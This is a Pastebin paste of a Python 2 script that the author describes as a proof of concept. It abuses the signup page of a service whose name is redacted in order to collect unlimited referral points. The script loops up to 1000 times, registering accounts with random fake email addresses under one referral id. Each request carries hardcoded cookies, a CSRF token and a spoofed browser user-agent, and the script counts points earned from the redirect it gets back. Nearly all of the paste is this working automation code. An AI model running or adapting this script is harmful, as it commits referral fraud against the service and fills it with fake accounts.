API tools faq
paste
gersy

Free_ponts

gersy
Dec 9th, 2016
135
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.39 KB | None | 0 0
raw download clone embed print report
  1. #! bin/python
  2. #
  3. #Desc
  4. #
  5. #When u register at __Redacted___.com or __Redacted___.com , you gain 10 ponts , if you invited your friend , you gain additional five points , registeration page was vulnerable to automation , so when you launch burp intruder and register random accounts , you get unlimited points , this is the poc
  6.  
  7. import requests,random,string,os,sys
  8. requests.packages.urllib3.disable_warnings()
  9. os.system('clear')
  10.  
  11. print """\033[93m
  12. ---------------------------------------------------------------------\033[0;34m
  13.  
  14.                =============
  15.         ==========================
  16.    ======================================
  17. ====--------------------------------------=====
  18.         \033[1;31m __Redacted___unlimitted Free Pages
  19.                 \033[1;32m@YasserGersy                  \033[0;34m
  20. ====--------------------------------------=====    
  21.    ======================================
  22.        ===========================
  23.                ============
  24.                    ----\033[93m
  25. ---------------------------------------------------------------------
  26. """
  27. proxyDict = { "http"  : "http://127.0.0.1:8080", "https" : "https://127.0.0.1:8080",   "ftp"   : "ftp://127.0.0.1:8080"}
  28. print '\033[93m'
  29. ref='4694232c'
  30.  
  31. if len(sys.argv) < 2:
  32.     ref=raw_input(' Your refernece id : ')
  33. else:
  34.     ref=sys.argv[1]
  35.  
  36. detected=False
  37. if len(sys.argv) > 2:
  38.     h=sys.argv[2]
  39.     detected=True
  40.  
  41. if detected is False:
  42.     h=raw_input('__Redacted___or __Redacted___(__Redacted___1/__Redacted___2) ?')
  43. h=h.lower()
  44. target='__Redacted___'
  45. if h=='__Redacted___0'  or h=='__Redacted___1' or h=='f' or h=='fa' or h=='-__Redacted___2' or h=='-__Redacted___3':
  46.     target='__Redacted___'
  47.  
  48. sent=0
  49. for count in range(1,1000):
  50.     suc=False
  51.     while suc==False:
  52.         try:
  53.             xc=''.join(random.choice(string.lowercase) for i in range(5))
  54.             id=xc+str(count+1)+'%40yaso.com'.replace('%40','@')
  55.             print ('\033[0;33m'+'\n['+str(count)+'] Trying with '+id)
  56.             url='https://www.'+target+'.com/account/signUp'
  57.             headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0'
  58.             ,'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
  59.             ,'Accept-Language': 'en-US,en;q=0.5'
  60.             ,'Referer': 'https://www.'+target+'.com/?ref='+ref+'&s='+target[0].upper()
  61.             ,'Cookie': 'hf_user=c2b4114088519744a1a16ea4576fad8d:08f0b2f643b18e04c4b5d1dd74e224924c45582a; hf_ref=KltdKmh0dHBzOi8vd3d3LmhlbGxvZmF4LmNvbS8/cmVmPTQ2OTQyMzJj; hs_puuid=89ee97372d9419a7c9800ce4d48e7cbec9399864; AWSELB=539B8B06C06731D8DA7FC45A56FD7AE3C92BC75F218439A6D2ECB6FBB76FB853B50DAF56905AC0AD0E55449B95EE7EDD183FB9B5D05CC806A1FAAA7D9D6844720489EDA53273B092450C1AB88DC874C1CC13629C; optimizelyEndUserId=oeu1474810509847r0.5900563481574318; optimizelySegments=%7B%22174938970%22%3A%22direct%22%2C%22175040343%22%3A%22ff%22%2C%22175048562%22%3A%22false%22%7D; optimizelyBuckets=%7B%7D; _hp2_ses_props.34263717=%7B%22ts%22%3A1474810512611%2C%22d%22%3A%22www.'+target+'.com%22%2C%22h%22%3A%22%2F%22%7D; _hp2_id.34263717=%7B%22userId%22%3A%224096601826228145%22%2C%22pageviewId%22%3A%223511581446818114%22%2C%22sessionId%22%3A%220199106237751283%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%223.0%22%7D; optimizelyPendingLogEvents=%5B%5D'
  62.             ,'Content-Type': 'application/x-www-form-urlencoded'}
  63.             data='signup%5Bredirect_url%5D=&signup%5Bpending_tsm_group_guid%5D=&signup%5Bcoupon_code%5D=&signup%5Bbilling_plan_quota_short_guid%5D=&signup%5Bbilling_period%5D=&signup%5Bcampaign_code%5D=&signup%5Bfirst_name%5D=&signup%5Blast_name%5D=&signup%5Butm_campaign%5D=&signup%5Butm_medium%5D=&signup%5Butm_source%5D=&signup%5Butm_term%5D=&signup%5Bis_from_external%5D=&signup%5B_csrf_token%5D=32af46f3cd2d2e77e715e8c8b4b504095d9850eef3c22585bb0eac6dc6f1ca35&should_show_password=0&signup%5Bemail_address%5D='+id+'&signup%5Bis_opted_in_marketing_emails%5D=1'
  64.             r =requests.post(url=url,data=data,headers=headers,allow_redirects=False)#,proxies=proxyDict)
  65.             body=r.text
  66.             if '<html><head><meta http-equiv="refresh" content="0;url=/onboarding/start"' in body:
  67.                 sent=sent+1
  68.                 print '\033[1;32m'+'Success  ..... Earned '+str(sent*5)+' pages on __Redacted___'
  69.             elif 'refresh" content="0;url=/info/chooseSignupPlan"/></head><' in body:
  70.                 sent=sent+1
  71.                 print '\033[1;32m'+'Success  ..... Earned '+str(sent*5)+' pages on __Redacted___'
  72.  
  73.  
  74.             else:
  75.                 print r.status_code
  76.                 print body+'\n'
  77.             suc=True
  78.         except Exception :
  79.             print '\033[1;31mErro'
  80.             time.sleep(5)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!